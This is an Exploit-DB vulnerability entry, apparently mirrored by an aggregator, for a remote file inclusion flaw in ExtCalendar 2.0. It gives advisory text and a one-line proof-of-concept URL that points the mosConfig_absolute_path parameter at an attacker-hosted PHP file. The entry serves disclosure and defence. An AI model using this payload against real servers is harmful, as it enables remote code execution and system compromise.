Lucene search

K
exploitdbMatdhuleEDB-ID:28190
HistoryJul 07, 2006 - 12:00 a.m.

Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion

2006-07-0700:00:00
Matdhule
www.exploit-db.com
19

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

source: https://www.securityfocus.com/bid/18876/info

ExtCalendar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

Version 2.0 is vulnerable to this issue; prior versions may also be affected.

http://www.example.com/extcalendar.php?mosConfig_absolute_path=[attacker]

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%